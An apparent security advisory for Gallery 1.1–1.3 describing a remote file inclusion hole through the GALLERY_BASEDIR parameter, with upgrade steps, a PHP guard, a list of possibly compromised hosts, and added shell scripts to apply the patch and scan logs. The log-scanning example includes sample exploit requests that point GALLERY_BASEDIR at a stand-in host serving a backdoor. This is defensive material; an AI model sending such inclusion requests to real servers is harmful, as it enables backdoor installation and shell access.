Security vulnerability in Gallery 1.1, 1.2.x, 1.3

An alert system administrator at PowerTech, an ISP in Norway, discovered a security vulnerability in Gallery yesterday. This security hole is a serious one: with it a malicious user can install a backdoor on your system and gain shell access with the same privileges as your webserver user. It's important that you realize that there are malicious people exploiting this bug *right* *now*. Read through to the bottom of this email for a list of IP addresses of sites that we believe may already be hacked, and for ways to detect whether you've been hacked.
We resolved this security issue within a day. However, since we are right about to release Gallery v1.3.1, we are holding off on publishing the final v1.3.1 with the fix until we're sure that the release is stable. The target release date for v1.3.1 (with the security fix) is Friday 8/2/2002.

______________________________
VULNERABLE VERSIONS OF GALLERY

This security hole affects every version of Gallery since v1.1 (released 7/5/2001). If you are running v1.1 or newer, you should upgrade to the latest build of v1.3.1.

_________
UPGRADING

In the meantime, if you would like, you can upgrade to our latest build, which is a release candidate and is very stable. You have two choices for upgrading.

1. If you are using Gallery from CVS, you can simply get the latest code from CVS:

% cd gallery
% sh configure.sh
% cvs update
% sh secure.sh

2. If you are using an official release, you can download a daily snapshot with the fix from:

http://jpmullan.com/galleryupdates

You should download the newest version (1.3.1-cvs-b11 or later).

You can get help on upgrading here:

http://gallery.sourceforge.net/help.php

We really want to help you through this process, but a flood of people sending email to the mailing list after having problems without reading the README/UPGRADING documents will probably not be well received. Please be considerate of our time and do at least a *little* reading before you dive in :-)

_____________________
PATCHING YOUR GALLERY

An alternative to doing a full upgrade is to patch the files that contain the security fix. This is relatively easy to do. All you need to do is edit these files:
captionator.php
errors/configmode.php
errors/needinit.php
errors/reconfigure.php
errors/unconfigured.php

and put these lines at the top of each of them (the block has to be inside PHP tags, so it starts with <?php):
<?php
// Hack prevention.
if (!empty($HTTP_GET_VARS["GALLERY_BASEDIR"]) ||
    !empty($HTTP_POST_VARS["GALLERY_BASEDIR"]) ||
    !empty($HTTP_COOKIE_VARS["GALLERY_BASEDIR"])) {
    print "Security violation\n";
    exit;
}
?>

The check refuses any request that supplies a GALLERY_BASEDIR value in the query string, the POST body or a cookie. These files use that variable to locate the rest of Gallery, and with PHP's register_globals enabled a request parameter of the same name overrides it, which is how the attackers point the include at a file of their own. Legitimate requests never carry that name, so nothing is lost by rejecting them.

If you are concerned or have doubts, it is also OK to simply rename or delete these files as a temporary measure until the official release is available. If your Gallery is configured properly, you should not need these files.
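With five files to edit it is easy to miss one or to add the guard twice. The script below is an added example written for this advisory, not code from the Gallery project: it prepends the guard above to each listed file, skips files that already carry it, keeps a .orig copy of every file it touches, and reports what it did. It assumes a Gallery 1.x directory passed as its argument whose files are writable by the user running it; the function names and the stand-in tree built at the end are this example's own, not a real installation.

```sh
#!/bin/sh
# Added example (not from the advisory or the Gallery project): apply the
# advisory's guard to every file it lists, in one pass. Assumes a Gallery
# 1.x tree whose files are writable by the user running this script.

# The guard from the advisory, with the opening <?php tag it needs.
GUARD='<?php
// Hack prevention.
if (!empty($HTTP_GET_VARS["GALLERY_BASEDIR"]) ||
    !empty($HTTP_POST_VARS["GALLERY_BASEDIR"]) ||
    !empty($HTTP_COOKIE_VARS["GALLERY_BASEDIR"])) {
    print "Security violation\n";
    exit;
}
?>'

# Files named in the advisory, relative to the Gallery directory.
PATCH_FILES="captionator.php errors/configmode.php errors/needinit.php
errors/reconfigure.php errors/unconfigured.php"

# is_guarded FILE: true if the guard already sits at the top of FILE
# (line 1 is <?php, line 2 is the marker comment).
is_guarded() {
    sed -n '2p' "$1" | grep -q '^// Hack prevention\.$'
}

# patch_gallery DIR: prepend the guard to each unguarded file, keeping a
# copy of the original as FILE.orig. Prints PATCHED/SKIPPED/MISSING per
# file; returns 1 if any listed file is absent (wrong path, or the tree
# is not a Gallery 1.x install).
patch_gallery() {
    dir=$1
    rc=0
    for rel in $PATCH_FILES; do
        f="$dir/$rel"
        if [ ! -f "$f" ]; then
            echo "MISSING $rel"
            rc=1
        elif is_guarded "$f"; then
            echo "SKIPPED $rel (already guarded)"
        else
            cp -p "$f" "$f.orig"
            # Write through the existing name so owner and mode survive.
            { printf '%s\n' "$GUARD"; cat "$f.orig"; } > "$f"
            echo "PATCHED $rel"
        fi
    done
    return $rc
}

# check_gallery DIR: true only if every listed file exists and is guarded.
check_gallery() {
    for rel in $PATCH_FILES; do
        [ -f "$1/$rel" ] && is_guarded "$1/$rel" || return 1
    done
    return 0
}

# Demo on a constructed stand-in tree (not a real Gallery install).
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/errors"
for rel in $PATCH_FILES; do
    printf '<?php\n// original %s\necho "ok";\n?>\n' "$rel" > "$demo_dir/$rel"
done
patch_gallery "$demo_dir"
check_gallery "$demo_dir" && echo "all files guarded"
rm -rf "$demo_dir"
```

Run patch_gallery /path/to/gallery, then check_gallery /path/to/gallery; a MISSING line means the path is wrong or the tree is not a Gallery 1.x install, and the .orig copies let you back the change out. Afterwards confirm from outside that a request such as errors/needinit.php?GALLERY_BASEDIR=x now answers "Security violation".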

________________________
POTENTIALLY HACKED HOSTS

The hackers used Gallery to install a backdoor program on target systems. chkrootkit is a good tool for checking whether your system has been hacked. Since the backdoor runs with the privileges of your webserver user, also look for processes, listening sockets and recently modified files (under the web root and in /tmp) that belong to that user.

Also, I was provided with a list of other sites that had downloaded this backdoor program. It's entirely possible that these sites have also been hacked. If your site is on this list, you should take it seriously.

62.100.56.4 harry.icmc.nl
62.129.136.116
62.250.6.51 www2.funprice.nl
64.28.22.35 intoxicated.tuxheaven.net
66.126.147.202 monet.wistful.net
129.241.200.24 samson.item.ntnu.no
129.241.56.64 textus2.stud.ntnu.no
130.89.166.178 wit389108.student.utwente.nl
141.84.103.49 alf.iuk.bwl.uni-muenchen.de
148.81.186.99 witch.sggw.waw.pl
158.38.152.245 fjellseter.freidig.idrett.no
193.71.199.153 malibu.wideroe.net
194.204.189.203
194.248.129.19
194.97.39.189 belgarath.topnet.de
195.116.24.209 www.metronet.pl
195.159.29.200 privat.sysedata.no
195.205.44.97 thorin.pulsar.net.pl
195.70.35.31 blacksun.hu
204.152.149.251 hh-ce1.net.monmouth.edu
208.180.231.184 cdm-208-231-184-brcs.cox-internet.com
212.182.110.22 pc22.uhc.lublin.pl
212.204.238.60 patrick.makkers-internet.nl
212.71.138.15 snail.infocity.cz
213.139.94.202
213.163.0.44 paloczp.vivendi.hu
213.241.3.145 www5.polbox.pl
213.84.124.55 altesco.xs4all.nl
213.84.38.128 orkz.xs4all.nl
217.110.252.109 agenda.kasserver.com
217.115.141.116 www.segelflug.de
217.115.192.3 s03.nxs.nl
217.160.88.2 taketoolbase.de
217.160.94.71 p15091059.pureserver.info
217.172.179.91 chicago091.server4free.de
217.8.137.158 c137158.catch.sdsl.no
217.97.225.10 vhost.v1.pl
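The advisory's detection advice is chkrootkit plus the host list above. As an added example (not part of the advisory), the shell functions below mine an Apache combined-format access log for the exploit's own signature: the guard rejects requests carrying GALLERY_BASEDIR, so any such request in your logs was an attack, and the parameter's value is where the backdoor was fetched from, which you can compare against the list above. The sample log is constructed for this example (198.51.100.7 is a documentation address standing in for an attacker host); the log format, the /gallery/ path and the function names are assumptions.

```sh
#!/bin/sh
# Added example (not from the advisory): pick exploitation attempts out of
# Apache "combined" access logs. Any request carrying GALLERY_BASEDIR is
# hostile; Gallery itself never puts that name in a request. Only the query
# string is visible in an access log, so POST bodies and cookies (the other
# two channels the guard closes) leave no trace here; POSTs to the five
# vulnerable files are reported as a weaker second signal.

VULN_FILES='(captionator|errors/(configmode|needinit|reconfigure|unconfigured))[.]php'

# basedir_hits LOG: every request line carrying GALLERY_BASEDIR.
basedir_hits() {
    grep 'GALLERY_BASEDIR=' "$1"
}

# hit_sources LOG: distinct client addresses behind those requests.
hit_sources() {
    awk '/GALLERY_BASEDIR=/ { print $1 }' "$1" | sort -u
}

# hit_targets LOG: where GALLERY_BASEDIR pointed, i.e. the host the backdoor
# was pulled from. Values are cut at the next & or space and the few %XX
# sequences a URL inside a URL needs (: / ? &) are decoded.
hit_targets() {
    sed -n 's/.*GALLERY_BASEDIR=\([^& ]*\).*/\1/p' "$1" \
      | sed -e 's/%3[Aa]/:/g' -e 's/%2[Ff]/\//g' -e 's/%3[Ff]/?/g' -e 's/%26/\&/g' \
      | sort -u
}

# suspicious_posts LOG: POSTs to the vulnerable files (body is not logged).
suspicious_posts() {
    awk -v re="$VULN_FILES" '$6 == "\"POST" && $7 ~ re { print $1, $7 }' "$1" | sort -u
}

# Constructed sample (not real traffic). 10.0.0.5 and 203.0.113.9 play the
# attackers, 198.51.100.7 the host serving the backdoor.
SAMPLE_LOG='10.0.0.5 - - [29/Jul/2002:14:02:11 +0200] "GET /gallery/errors/needinit.php?GALLERY_BASEDIR=http://198.51.100.7/ HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.44 - - [29/Jul/2002:14:05:03 +0200] "GET /gallery/view_album.php?set_albumName=holiday HTTP/1.1" 200 8032 "-" "Mozilla/5.0"
10.0.0.5 - - [29/Jul/2002:14:06:50 +0200] "GET /gallery/captionator.php?GALLERY_BASEDIR=http%3A%2F%2F198.51.100.7%2Fcmd.txt%3F HTTP/1.0" 200 340 "-" "Mozilla/4.0"
203.0.113.9 - - [30/Jul/2002:02:15:22 +0200] "POST /gallery/errors/configmode.php HTTP/1.0" 200 120 "-" "-"'

# write_sample_log PATH: save the constructed log so the functions above can
# be run against it (or point them at your own access_log instead).
write_sample_log() {
    printf '%s\n' "$SAMPLE_LOG" > "$1"
}

log=$(mktemp)
write_sample_log "$log"
echo "== requests carrying GALLERY_BASEDIR"; basedir_hits "$log"
echo "== client addresses"; hit_sources "$log"
echo "== where the backdoor was fetched from"; hit_targets "$log"
echo "== POSTs to vulnerable files (body not logged)"; suspicious_posts "$log"
rm -f "$log"
```

Point the functions at your real access_log and its rotated copies. A GALLERY_BASEDIR sent in a POST body or a cookie never reaches the access log, so an empty result from basedir_hits does not clear you; check suspicious_posts, then the file and process checks above, and treat any hit as compromise of the webserver account until proven otherwise.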